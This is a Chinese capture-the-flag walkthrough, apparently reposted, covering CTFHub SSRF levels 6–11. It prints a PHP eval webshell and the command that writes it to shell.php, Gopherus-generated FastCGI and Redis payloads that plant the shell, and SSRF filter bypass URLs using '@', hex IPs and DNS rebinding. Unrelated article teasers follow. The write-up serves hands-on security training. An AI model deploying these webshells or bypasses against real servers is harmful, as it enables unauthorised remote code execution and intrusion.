CTFHub SSRF靶场通关攻略(6-11)

FastCGI协议

首先写一个php的一句话木马,并进行base64编码

<?php @eval($_POST[cmd]);?>

编码完成后把他写入shell.php文件中

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

使用Gopherus工具生成payload:

执命令

python2 gopherus.py --exploit fastcgi

给他 /var/www/html/index.php  文件

得到payload,复制然后进行url编码进行访问

访问到页面说明写入成功,那么我们访问shell.php文件

然后把url栏的网址复制下来,在菜刀上进行连接

进入根目录后往下翻,找到flag

然后打开复制提交flag

Redis协议

这一关和上一关是一样的只是这关是redis协议

我们进入kali,执行以下命令

python2 gopherus.py --exploit redis

执行完成之后,我们选择phpshell

然后给他/var/www/html

之后就只需要我们输入我们的php一句话木马就可以得到payload

<?php @eval($_POST[cmd]);?>

我们把得到的payload进行url编码

编码之后复制下来在url后面进行拼接访问

然后访问shell.php文件

访问成功就可以用菜刀进行连接,复制网址,进行连接

进入根目录找到flag文件,打开即可得到flag

URL Bypass

这关显示url必须以这个网址为开头,那么我们在url后面构造一个payload就行

http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

这关不能用十进制进行访问

那么我们去进行进制的转换,把127从十进制转为十六进制

然后在7f前加上0x让他解析到这里为十六进制然后 . 也换成0,那么127.0.0.1就变成了如下

http://0x7f000001/flag.php

这里也可以直接访问localhost(因为localhost也是指的本机可以替换127.0.0.1)

302跳转 Bypass

这关要绕过127.0.0.1去访问,我们可以用localhost

DNS重绑定 Bypass

我们进入这个网站进行dns重绑定https://lock.cmpxchg8b.com/rebinder.htm

A写127.0.0.1 B写127.0.0.2 然后复制到url后面进行拼接

7f000001.7f000002.rbndr.us/flag.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/51513.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【工控】线扫相机小结

背景简介 我目前接触到的线扫相机有两种形式: 无采集卡,数据通过网线传输。 配备采集卡,使用PCIe接口。 第一种形式的数据通过网线传输,速度较慢,因此扫描和生成图像的速度都较慢,参数设置主要集中在相机本身。第二种形式的相机配备采集卡,通常速度更快,但由于相机和…

Clickhouse集群化(三)集群化部署

1. 准备 clickhouse支持副本和分片的能力&#xff0c;但是自身无法实现需要借助zookeeper或者clickhouse-keeper来实现不同节点之间数据同步&#xff0c;同时clickhouse的数据是最终一致性 。 2. Zookeeper 副本的写入流程 没有主从概念 平等地位 互为副本 2.1. 部署zookeep…

Mysql高级 [Linux版] 性能优化 数据库系统配置优化 和 MySQL的执行顺序 以及 Mysql执行引擎介绍

数据库系统配置优化 1、定义 数据库是基于操作系统的&#xff0c;目前大多数MySQL都是安装在linux系统之上&#xff0c;所以对于操作系统的一些参数配置也会影响到MySQL的性能&#xff0c;下面就列出一些常用的系统配置。 2、优化配置参数-操作系统 优化包括操作系统的优化及My…

C# UserControl、Dockpanel和DockContent、Cursor、

一、UserControl类 UserControl 是 .NET 中的一个基类&#xff0c;用于创建自定义控件&#xff0c;主要用于 Windows Forms 和 WPF。通过继承 UserControl&#xff0c;你可以设计和实现具有特定界面和功能的控件组件。UserControl 允许你将多个标准控件组合在一起&#xff0c;…

设备共享租赁小程序系统开发制作方案

设备共享租赁小程序系统让用户方便地租赁或出租各类设备&#xff0c;包括但不限于工具、电子产品、运动器材等&#xff0c;以满足临时使用需求&#xff0c;同时为设备所有者创造额外收益。 目标用户 个人用户&#xff1a;需要临时使用工具、车辆等设备的个人。 企业用户&#…

73 OSPF图解LSA(华三)

71 OSPF多区域实验(华三)-CSDN博客文章浏览阅读166次,点赞8次,收藏3次。实操https://blog.csdn.net/qq_56248592/article/details/141563010?spm=1001.2014.3001.5501 一 基础配置省略 上次的原图基础上扩展

C++ JAVA源码 HMAC计算 openssl 消息认证码计算 https消息防篡改 通信安全

签名和验签 把所有消息按顺序合并成一条信息&#xff0c;对这个信息用密钥进行签名。 签名信息通过 HTTP 头 Sign 传递&#xff0c;没有携带签名或者签名验证不通过的请求&#xff0c;将会被认为异常请求&#xff0c;并返回相应 code 码。 校验方法&#xff1a;根据 http请求…

重塑视频监控体验:WebRTC技术如何赋能智慧工厂视频高效管理场景

视频汇聚EasyCVR视频监控平台&#xff0c;作为一款智能视频监控综合管理平台&#xff0c;凭借其强大的视频融合汇聚能力和灵活的视频能力&#xff0c;在各行各业的应用中发挥着越来越重要的作用。 EasyCVR平台不仅兼容多种主流标准协议及私有协议/SDK的接入&#xff08;如&…

《探秘神经网络:人工智能的强大引擎》

在当今科技飞速发展的时代&#xff0c;人工智能已经成为了热门话题&#xff0c;而神经网络作为人工智能的重要组成部分&#xff0c;正发挥着越来越关键的作用。那么&#xff0c;什么是神经网络呢&#xff1f;它在人工智能中又有哪些令人瞩目的应用呢&#xff1f; 一、什么是神…

mysql高可用之组复制 (MGR)

目录 1 MySQL的主从复制介绍 2 组复制流程 3 组复制单主和多主模式 3.1 single-primary mode(单写或单主模式) 3.2 multi-primary mode(多写或多主模式) 4 实现mysql组复制 4.1 MASTER 1 4.2 MASTER 2 4.3 MASTER 3 4.4 MASTER 1 检验 1 MySQL的主从复制介绍 MySQL Group Rep…

使用Java将Google书签导出为JSON文件

背景介绍 Google书签是一个非常有用的工具&#xff0c;可以帮助我们管理和存储网页链接。然而&#xff0c;Google书签的导出文件格式是HTML文件&#xff0c;而在某些场景下&#xff0c;我们更希望将这些书签转换成更易于处理的JSON格式。本文将介绍如何使用Java和一些常见的库…

【Linux】初步识操作系统

linux专栏&#xff1a;《Linux入门系列》 系列文章&#xff1a;gdb-调试器初入门&#xff08;简单版使用&#xff09; 编辑器vim入门&#xff08;概念模式转换技巧&#xff09; 目录 1. 概念 2. 设计操作系统的目的 3. 定位&#xff1a;操作系统负责管理 4. 如何理解管理 …

使用IntelliJ IDEA将本地项目推送到远程Git

1&#xff0c;安装Git 打开 下载地址&#xff0c;下载Git安装包。根据引导程序&#xff0c;完成安装。 2&#xff0c;IntelliJ IDEA配置Git 打开IntelliJ IDEA&#xff0c;依次点击File>>Settings…>>Git&#xff0c;然后配置自己的Git的路径&#xff0c;然后点…

浅聊java中的枚举以及关于枚举的常见面试问题

基本概念&#xff1a; 什么是枚举&#xff1f; 枚举&#xff08;Enum&#xff09;是一种特殊的类&#xff0c;它用于表示一组固定的常量。枚举从Java 5&#xff08;也称为Java 1.5&#xff09;开始引入&#xff0c;提供了一种比传统常量&#xff08;如使用public static fina…

mysql 死锁 锁表的解决方法

查看那个表锁了 SHOW OPEN TABLES where In_use > 0; show processlist SELECT * FROM information_schema.INNODB_TRX; 查看锁的进程 kill 掉进程id (trx_mysql_thread_id)

pyintaller pyqt5 pytest打包后 找不到测试实例

pyintaller pyqt5 pytest打包后 找不到测试实例 1.项目目录 my_project/ ├── src/ │ ├── tests/ │ │ ├── test_example.py │ ├── main.py ├── my_project.spec2.main.py import sys from PyQt5.QtWidgets import QApplication, QWidget, QPushBut…

PCIE-Precode

Transmitter Precode Request: Precoding可以有效的降低Burst errors&#xff08;突发连续&#xff09;的影响&#xff0c;但是Bit Error Rate&#xff08;BER&#xff09;将上升为之前的两倍. ​​​​​​[FPGA 实现及PCIe IP 核知识点] PCIe为什么要增加Precoding&#xff…

Vue3:命名路由

当创建一个路由时&#xff0c;我们可以选择给路由一个 name&#xff1a; const routes [{path: /user/:username,name: profile, component: User} ] 然后我们可以使用 name 而不是 path 来传递 to 属性给 <router-link>&#xff1a; <router-link :to"{ nam…

趣味算法------拯救阿拉德大陆

目录 ​编辑 题目描述&#xff1a; 思路解析&#xff1a; 具体代码&#xff1a; 总结&#xff1a; 题目描述&#xff1a; 此时一批勇士也随之而来&#xff0c;但其能力也是参差不齐&#xff0c;我们需要挑选出最优秀的勇士来守护这片大陆。每位勇士都有属于自己的编号&am…

力扣题/回溯/全排列

全排列 力扣原题 给定一个不含重复数字的数组 nums &#xff0c;返回其 所有可能的全排列 。你可以 按任意顺序 返回答案。 示例 1&#xff1a; 输入&#xff1a;nums [1,2,3] 输出&#xff1a;[[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]] 示例 2&#xff1a; 输入&a…